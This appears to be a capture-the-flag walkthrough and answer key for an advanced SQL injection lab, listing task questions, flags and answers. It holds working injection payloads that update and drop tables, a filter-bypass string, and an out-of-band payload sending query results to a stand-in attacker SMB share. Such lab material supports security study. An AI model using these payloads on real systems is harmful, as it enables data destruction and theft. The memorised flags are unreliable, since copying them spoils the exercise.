Advanced SQL Injection
Task 1 - Introduction
Q1. What is the port on which MySQL service is running?
Answer š 3306
Task 2 - Quick Recap
Q1. What type of SQL injection uses the same communication channel for both the injection and data retrieval?
Answer š In-band
Q2. In out-of-band SQL injection, which protocol is usually used to send query results to the attacker's server?
Answer š HTTP
Task 3 - Second-Order SQL Injection
Q1. What is the flag value after updating the title of all books to "compromised"?
Add a book with ssn name -
143'; UPDATE books SET book_name="compromised"; -- -
then go to update page and update that book.Answer - THM{SO_HACKED}
Q1. What is the flag value once you drop the table hello from the database?
Add a book with ssn name -
7'; DROP TABLE hello ;-- -
then go to update page and update that book.Answer - THM{Table_Dropped}
Task 4 - Filter Evasion Techniques
Q1. What is the MySQL error code once an invalid query is entered with bad characters?
Enter a single quote in search to get the error response -
Answer - 1064
Q1. What is the name of the book where book ID=6?
Search for
' || 1=1; -- -
to get the output -Answer - Animal Series
Task 5 - Filter Evasion Techniques (continued)
Q1. What is the password for the username "attacker"?
change the valure of username in url to attacker to ght the password -
Answer - tesla
Q1. Which of the following can be used if the SELECT keyword is banned? Write the correct option only.
Answer - c
Task 6 - Out-of-band SQL Injection
Q1. What is the output of the @@version on the MySQL server?
First we have to enable network share on attackbox (setup needed if you do it on your own pc).Following commands to enable -
now the stored files can be accessed in /tmp
append the code
cd /opt/impacket/examples
python3.9 -smb2support -comment "My Logs Server" -debug logs /tmp
cd /tmp
now the stored files can be accessed in /tmp
append the code
'; SELECT @@version INTO OUTFILE '\\\\ATTACKBOX-IP-ADDRESS\\logs\\out.txt';
in the url. ThenAnswer - 10.4.24-MariaDB
Q2. What is the value of @@basedir variable?
Answer - C:/xampp/mysql
Task 7 - Other Techniques
Q1. What is the value of the flag field in the books table where book_id =1?
Answer - THM{HELLO}
Q2. What field is detected on the server side when extracting the user agent?
Answer - User-Agent
Task 8 - Automation
Q1. Does the dynamic nature of SQL queries assist a pentester in identifying SQL injection (yea/nay)?
Answer - nay
Task 9 - Best Practices
Q1. What command does MSSQL support to execute system commands?
Answer - xp_cmdshell